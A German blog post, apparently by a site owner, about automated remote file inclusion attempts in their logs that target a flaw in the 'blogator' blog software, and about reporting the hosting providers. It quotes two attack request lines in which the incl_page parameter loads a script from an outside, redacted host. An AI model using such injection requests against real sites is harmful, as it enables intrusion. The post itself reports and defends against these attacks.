Hätte ich nur
am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir
die Sicherheitslücke der zufällig gleichnamigen
französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt
andere hat.
Mein Log ist jedenfalls voll von Versuchen der Art
GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt?????
Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine.
Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:
- Eine Seite war bei Geocities. Da hab ich Yahoo eine Mail geschreiben. Das eigentlich dafür vorgesehene Kontaktformular wurde auf deren Server nicht gefunden...
- Der andere Provider ist ein kleiner Provider aus Coburg. Der hatte ein Formular für Petzer, zwingt mich aber, dort dazu unsinnige "Muss-Felder" mit für beide Seiten nutzlosen Infos auszufüllen. Es hat keinen Sinn, die IP-Adresse einer virenverseuchten Homepage abzutippen. Aber wenn die das möchten, geb ich gern irgendwas ein...
Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer.
Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch...
Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher
verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet.
Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf:
/2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt??
Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht.